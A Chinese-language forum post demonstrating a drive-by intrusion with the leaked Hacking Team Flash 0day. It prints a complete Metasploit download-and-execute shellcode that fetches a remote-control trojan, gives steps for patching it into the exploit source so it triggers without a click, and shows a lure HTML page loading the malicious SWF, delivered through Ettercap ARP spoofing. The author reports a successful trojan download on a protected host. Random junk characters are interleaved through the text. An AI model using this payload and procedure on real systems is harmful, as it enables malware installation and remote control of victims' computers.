找回密码
 立即注册
查看: 2015|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! ?# I+ G3 p; X% [7 C 三、flash 0day之手工代码修改制作下载者实例入侵演示 & Q0 R4 ]+ r2 e# O# e, r v

& s i, ^6 ]) s5 C

3 R! E) X6 f! \3 a5 [ L5 H 利用到的工具: 8 l8 V# {" U5 y& c4 q' r0 s

$ q8 H6 l; q# r1 Q* x( U

& Q) E# I6 X! Z9 \( n9 C' @ Msf & d0 n1 r: G' w( B* q

7 S- U8 y/ C0 k8 M1 E

. M2 y/ p4 p+ t* D Ettercap , ]( H) n$ h- p4 e2 |) R0 ]( }

) X1 n# C1 j7 u3 j' ^' s

) z& x% B' h& b( H8 b8 T) h# j Adobe Flash CS6 5 i R4 Q5 D: L) N- K: M0 I0 Z( z

: S8 V1 Q+ Q' g/ D4 v

$ z: t) j+ x* x" N" T) w" Y Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 : t( Q4 L4 s4 ^5 [

# i7 ^6 l7 ~( E

. F5 x0 z) b) b' y6 N' M 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 3 A, {2 A! o* q

! A: Z$ k8 v% R# w0 q* i0 U4 j- l, v' S

0 c$ Y$ H: D% } 如图: ! l. D- _ L: `0 W. }+ Y

6 l* C5 w* F* v9 W: `, E

+ A1 T2 P8 V8 h% C; e   1 @" m) B/ z2 G% F& F

7 V1 {6 |% E$ Y4 M

) t' W5 ?! F( j. z3 a$ I+ ]   0 Q3 z/ ~$ t3 L$ x0 p9 @( h X( c* }) r

* f6 A# B, m% V8 Z* `' ? }

7 ^# N" B# C( }; s, @, X 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: . D0 F: N- v! `" e

) d) {7 a) ]8 g: o

# e" A5 i3 V$ y c: Z0 F( Y   ( c# N2 L* y7 G) i9 r& _) g; H

9 p7 ~. N8 @ T2 a

& m4 t7 w4 f$ G7 z4 K   3 z/ \) h) q/ S7 X5 o% y5 j

0 c! n$ \7 E* W# d

! s. U* G5 J& y9 _% w 然后执行generate -t dword生成shellcode,如下: * \( X' i* @7 |9 N

8 f$ d$ t# W O, h

- {! R8 p+ [. c7 _) ]2 v   9 O! h% c9 B9 p& }: X# t5 ?# n* N

) |- P4 A1 k& e' F

1 R# L: W" b9 n5 o% I% B 复制代码到文本下便于我们一会编辑flash exp,如下: 3 s, @( ]% d! k8 |9 j! F5 c

& b: D- J4 P+ l: p/ m- H

. o6 B# O. B& C Q8 Z 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, $ h; N" S) O6 F( X' ~5 u

8 e3 d$ V7 W2 E+ i0 Q' b4 |

8 {& d* L# J+ T0 _; C" O 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, " d: G# y: X: w/ p: Z5 X

1 U. i7 v& Q t K/ p' X2 H

' K `- q9 R+ |8 v% J5 V 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 7 T4 G0 X! q. ^! ^9 S, }

2 M# M% ^& V6 \2 \7 |9 y9 F

/ b7 N6 U: L. J% Z. A4 r. o 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, : w' o3 g4 K& o0 ]( u) S2 @2 ?/ V

. O, y; I U" x$ C3 j2 J0 `* g

1 ~- _3 e' K5 Z9 J 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 7 V, Z* G4 Q. O

, X: N4 ~6 i8 a6 k

. V. _% i: V+ M/ }1 \8 O( a 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ( x9 @6 d- m! C. B% S" s: q

2 V8 T1 f8 x9 ~- j2 L; W

9 S2 b$ u! |9 w 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, + k4 A; ~. o. E4 M

* ?! P% B3 n& {9 `

: `2 w+ R: w" r8 c4 i! X5 `9 p 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, & p5 V# }7 y/ C, V; {8 n

1 i- Y1 j& V6 }% ]

7 \" J0 P) H' d 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 1 u- Z" M0 X6 a1 i# o

* d9 N. f& e: |: O$ c A

; e7 x3 l) h; B/ d' J 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 8 P( g9 Y+ _2 Z# s& f

H' V$ C3 W$ e" i& l3 a Y

( I5 l$ {! O. U4 K; o* N, M 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ( g+ ], p% F6 H& B3 U0 P0 ?

2 u6 Z: n1 o, C0 q9 G6 o

6 T5 H3 }, n8 j K2 p$ v& u 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, - U" p7 `: p+ e: R/ |

5 ]6 n" O, I3 g

& B; l2 u2 O4 @ z3 M3 W 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - B( Z& K1 J" z! n# _

7 }9 _2 H, h1 _( p, O, ~

/ O2 L, v& F! p. \ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 : g- \* l U# R( S0 k, M; H

X1 h0 p& t) } M' r' {5 {% e

|" c- \, j( n) ~- B9 {   * D( D( t7 ^ [$ \+ ^0 ^

! ]$ ~8 k: y5 X( |% v

: x1 k! c$ F# P   - {' ~: J0 [! n) y

l- g) Y6 { l# s

4 P/ `" m' |1 W% o' t 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 3 r: K! ]3 R9 a; a( i, i

c! r& F Z" T7 g# U

8 Y# l+ [) X- L- C c3 S$ U$ d( v   s, m# g3 R% h. M& i: [

4 G, {, z' @; B

. a; s0 c. T8 t( ~ l+ v7 Y% \ 先修改ShellWin32.as,部分源代码如图: " K. w: |# n% `3 k! z v# s

/ J( @9 A Y* ], x0 B: a% K

& b0 q P! L2 \6 O   ; T9 R, M/ ?, m) F

) I. |" t. r8 h( ~) K

2 M$ o. n6 `2 |) x1 d" _ |# V 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: . a3 a1 Y* S: M ~0 L

1 R. d/ c. J( Y, i+ T( n

7 K* S t0 }. l" O2 W( N! w: [0 n2 d   m* a) U/ f" `# e

% p. m$ j$ I- K. J, Y( r

: E# N. o/ t3 F6 D6 C 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: - }5 i9 t3 i& c+ _) E' m" H/ [

: G+ i! k* _( h% o0 k; \

3 k+ q D' o# ~5 |% }( ^   / C) K. u/ h5 k, E* t2 w

- t9 n6 J/ _0 p$ c1 V. Y& b

: |, g3 W9 G6 l+ O6 f 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: % Y* \- s" w& \5 p$ `4 i! w! G

! Z r- ^) J1 Y; ]4 j. y

- [/ U2 D* p5 z% y2 V5 }0 H   8 p; D6 x) N" k. a! H

' k. y1 G, r! c7 b7 u5 i7 O

2 v$ \3 U3 T E5 \* U   0 G+ ^* O8 y$ w$ e6 P- \

% n o5 K$ v; k+ o8 R

+ w4 j3 n) ]" L ~3 J   ; o% A. Y- A% B5 `) k

9 R0 t# x- S- Y/ A* P

. p' ^4 P9 w% G8 w3 v( l$ H4 T 然后点保存,下面我们来编译一下,打开 ! z% W7 i3 w" n$ N

6 Z7 u% n$ Q$ o" k/ D* R

8 j4 z$ v3 R5 Y, _ exp1.fla然后点文件-发布,看看编译没错误 7 f6 B6 q, U4 z8 ^7 l8 q2 l

# P+ n7 a2 a- C2 W* i6 G

% s. a5 \2 |+ T1 G# w   * D( T8 u1 S- |4 k6 R, Y

$ c k: p5 T6 |! s" ?+ d

: k" w1 ~" T+ J5 S& P% }! u$ @   ) k1 i/ w$ K; X: [! {# S

! C+ C% [# [$ J O3 N" x- l

' v5 y* {" G4 e# G/ F T   % Z5 Q/ d" ~3 i4 d3 V

7 K# I) t" l; e; D4 f8 v4 w0 u

3 H4 L& O% e k- j. k+ I   5 a! L' a/ }7 `

" B8 @& |5 p! M( h

9 x2 p% w; o) t3 g 然后我们把生成的 1 e" T7 f: L& b

+ p* u* w y4 Q" u- O6 R* s1 d

7 h/ e9 h$ T* ]. C; Y exp1.swf丢到kailinux /var/www/html下: : \$ m" ]6 d) @. D9 N# H; a2 N: Q# E

! d8 m7 e, q) _; x

5 B- }5 G( \" @/ V. d 然后把这段代码好好编辑一下 % A5 ~6 p: i! x/ b) `

* {. B( g3 Y& Y/ R2 a. w( v! f

0 C/ u. X2 m4 J {- V' x' B   3 j/ S4 O6 i$ v7 U/ T1 D U8 P

s& z8 h0 i' ]3 E: k6 g' P

1 k2 ]. O4 `- m- Y, M$ S4 o   . X9 b: y4 E2 C) a0 u8 C

( h, a% ?# M: M8 V

0 e# g$ K# z1 u8 Z   . m: a, H, s7 C; r i# h! g( a

6 X( {% O% x3 ^+ J6 ?

3 A) ]1 k- G+ ~ i   - Z/ O, @6 a R5 C1 v4 Z

& p$ ~9 |/ N2 v5 _3 }

: z% W0 z" c2 E& t y" z   4 O0 ?( ~* c. t' U

; Z% h0 {- r6 [) T( E

3 E* F) Q: A# J2 h1 e   : z- e5 V. Z; l, T+ f4 O9 _

$ d8 \, q9 [0 ~9 O" A% m8 v

* X8 m$ }' V+ W0 H <!DOCTYPE html> 0 ]" {6 J& ]5 o2 f! W: ~. F7 }( B

+ p3 v! C7 L7 O; i; M4 n) d

6 C# @% d& Z! n( b, O n& X: a <html> : Z: q" K O/ v+ x- C

n- e. C9 v; ~( E

2 l9 E! I/ |6 W, V, c; j <head> 1 N5 X& @. Y3 `1 z* M1 h; V

4 ~# m! e y: {* h; i( d2 b

2 k9 Y- V/ n+ b5 } <meta http-equiv="Content-Type" content="text/html; # Z! J$ p/ ~- q6 g T2 D

- O% ?' d( I& L9 c4 W, e

9 V& p, z* [ q/ \ charset=utf-8"/> & H {, V+ X. c) [) y) {( F' y

% P0 C1 E, W O9 o, R; e

m; v& Q g# c( M' }5 _ </head> 9 e( [/ J Q+ Q) H6 F8 e

3 Y Y6 w/ _1 l4 f% A/ @, g

1 o* k' J- [9 R <body> 1 Z9 t3 v" B8 G: s# Y7 ^4 i

( p' p8 R- }/ `$ d5 D6 Y3 P: Y3 z

! j! o( W3 M6 ~* G4 @$ p2 J <h2> Please wait, the requested page is loading...</h2> 3 @4 c+ y" z$ i7 g$ o

; D' @% {; {6 {5 Y% l- M N& s# V

4 n- V4 R3 M& k0 ]2 u7 ~' i3 u7 u" p <br> " g) K3 \2 l- `4 n

' Q3 ?/ Y; W, k& W; K8 n1 Q

$ C+ x% L7 p0 @+ w0 ?4 ~4 H <OBJECT * ^ [! p$ B1 r$ t" ~

! [& U: o) f/ _0 W

8 r& j" {, U1 q8 e5 K0 |1 |. S classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 7 f1 J) t6 x+ p$ @4 a; g

2 `9 K* D" C3 m1 @; ^/ ]* `. E6 ?

0 f4 ^9 j: e. U VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 a" x# U* Y K" P. y

9 o x! N. g; [2 A- F' e. r; i; S* L

3 x* f: Y, ]6 q; D </body> 8 p% m+ k$ v+ H {& f0 d" r

7 K7 D% Y! t9 |) {

: `- e) ~( I9 e6 Z5 I$ l, G$ C9 u8 \ <script> # h) P. p( G; x5 e

1 Z- y( ?# X7 c* v' A0 L

# T! f ~' ?7 c     setTimeout(function () { , ~4 q0 L! x5 I$ P; T" s

0 |: r3 N4 P; X2 I

$ O# n" |, S8 {          * m b: J6 c# d* o6 S8 a6 k+ u

" S/ C1 X, Y7 Y

0 ]5 g5 [/ ]8 d5 I) Z window.location.reload(); - y: U) _, J3 j7 ?+ \

0 m: s# S* ?' D

. U* q: o, T, P% ~1 j     }, 10000); % T8 P+ F2 l3 ~3 O6 Y; @7 t9 L

* f/ [8 j" a' v; t4 k9 u

- O$ q/ z$ U. V5 Y! _4 `5 O7 W   0 i) m" g6 q- g8 |/ Z

}" h4 Q5 G8 h/ q

6 [6 J K7 T6 v, w </script> / |& ?9 G; [& r9 r

% G% A3 H' {3 Q) o; r: W: r

0 P- m& G% k6 M3 U </html> 2 ~2 C4 e: V( P1 H7 z2 p

P! u7 a# Q V9 b% v$ V2 d; o2 P

|4 `/ s8 e5 ~7 p   9 T# F+ f3 n, w* Y

$ A" `1 L" [. q

$ z6 l2 _2 Q& _ ?) D) a$ s 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ( c+ b2 c4 w, ?0 r* M

( y( q! g1 y$ r/ c8 |9 t

, k! |: w6 S4 v3 T   ! _/ E. |. z. k3 o. b

% ^" M. [6 G- u8 L* ^% W! e

: M) ?3 u* r3 @5 _: F   & f& L" [5 j7 a- m& @3 y

. P0 m+ m3 C: P- M7 m) A

7 J4 w5 V6 [/ C   ' ]0 s! |) M. M

! y& l0 x; [4 ?% [ t2 b

/ d% V% c$ R5 d9 E' v; d3 p   1 }& L* y6 A$ c

D' p6 s6 a7 z7 q

" v+ F: ^! \( i. R' T3 B   4 T C, s# e9 W- q6 I

$ z% S3 d1 X: I. |- W) H' r! F j

4 K, d5 Y6 |% H' z/ K& A* p3 F 下面我们用ettercap欺骗如图: / A7 K5 k! l- w8 U

4 Y' j$ V( e. Z4 m

9 ~1 Q6 { n7 h: o   4 H$ o( T0 }+ f. i

1 ^6 ]' S! V0 o

y- x/ X! q* _5 e" [   + V6 q }- C* k# [

% K0 P1 w1 U0 h

2 I' p5 O2 i' M2 u/ l& e 下面我们随便访问个网站看看: + @- c5 ~6 {' g0 I& A2 O

* H, `+ i+ g: v. ~; p6 F

" b7 m* v# h$ j6 J) f! f9 I 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: # L6 y1 x2 j7 _/ x

`6 N) R! e; K% o- r1 D, ^$ {

% N7 o( s( {3 P. h* l1 A   : B/ {8 Z" z8 m+ Q" o' V% k

Y! M5 L6 w+ P: V+ H% T' {9 A

2 J' R9 Z0 [% `6 C6 l ^ 我们看另一台, 9 w9 l3 R0 K _- Q5 v# v

' `# a( d0 J: p0 x

* }$ V9 C; W3 t, e" b, ] 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 ' v" w2 y5 q+ Q

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表